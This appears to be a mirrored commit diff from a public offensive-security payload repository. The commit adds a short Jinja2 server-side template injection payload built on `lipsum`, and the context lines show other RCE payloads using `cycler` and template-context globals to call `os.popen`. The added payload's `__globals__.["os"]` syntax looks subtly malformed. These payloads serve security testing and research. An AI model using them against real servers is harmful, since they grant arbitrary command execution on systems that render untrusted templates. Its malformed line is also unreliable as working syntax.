mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
Merge pull request #642 from p0dalirius/patch-1
Adding Jinja2 RCE through lipsum in Templates
This commit is contained in:
commit
8d2c30e969
@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an
|
|||||||
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
We can use these shorter payloads (this is the shorter payloads known yet):
|
We can use these shorter payloads:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
||||||
@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):
|
|||||||
|
|
||||||
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
|
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
|
||||||
|
|
||||||
|
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ lipsum.__globals__.["os"].popen('id').read() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
Source: https://twitter.com/podalirius_/status/1655970628648697860
|
||||||
|
|
||||||
#### Exploit the SSTI by calling subprocess.Popen
|
#### Exploit the SSTI by calling subprocess.Popen
|
||||||
|
|
||||||
:warning: the number 396 will vary depending of the application.
|
:warning: the number 396 will vary depending of the application.
|
||||||
|
Loading…
Reference in New Issue
Block a user